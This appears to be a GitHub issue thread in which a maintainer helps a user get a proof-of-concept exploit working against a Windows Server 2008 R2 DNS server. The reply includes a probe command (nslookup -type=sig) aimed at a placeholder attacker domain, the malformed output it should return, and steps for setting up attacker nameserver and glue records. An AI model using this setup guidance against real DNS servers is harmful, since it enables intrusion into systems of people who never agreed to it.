List Index Out of range

[dino-chiio]

• when trying to exloit this PoC in Windows Server 2008 R2, I got an error about "List Index Out of range"
  Please help me; I use Ubuntu 20.04 to exploit.
  

[reinaertvdc]

This error most likely indicates that the victim DNS server cannot find your evil DNS server.

Under the hood, the following lookup is failing:

nslookup -type=sig -retry=0 9.dz.<EVIL_DOMAIN>

You can try running the above command from your attack machine, and the output should look as follows:

;; Warning: Message parser reports malformed message packet.
;; Truncated, retrying in TCP mode.
;; Warning: Message parser reports malformed message packet.
;; ;; Question section mismatch: got 9.\159\142\001\032\000\000\024\000\001\192\012\000\024\000\001\000\000\000\016\000\.\000\001\005\000\000\000\000\016hv\162\031],\202\031\158\004\192.\000\000\000\000\000\000\000\000\000\000\000\000/TYPE0/RESERVED0

However, in your case I'm guessing the output will look like:

;; Got SERVFAIL reply from <DNS_RESOLVER_IP>
Server:         <DNS_RESOLVER_IP>
Address:        <DNS_RESOLVER_IP>#53

** server can't find <EVIL_DOMAIN>: SERVFAIL

I think the most likely causes are:

1. You have not set the primary nameserver for <EVIL_DOMAIN> to be ns1.<EVIL_DOMAIN> as the script assumes. You will need a glue record to make this work, so check with your domain registrar if and how you can create one.
2. ns1.<EVIL_DOMAIN> is not pointing to your evil DNS server.
3. The victim DNS server cannot reach your evil DNS server for whatever reason. This could be a routing or a firewalling issue on either side.

Doublecheck your setup and make sure that the nslookup command at the beginning of this comment returns the expected output. Once that is the case, you can try running the script again.

This is not the simplest exploit to set up. I'm speaking from experience :-)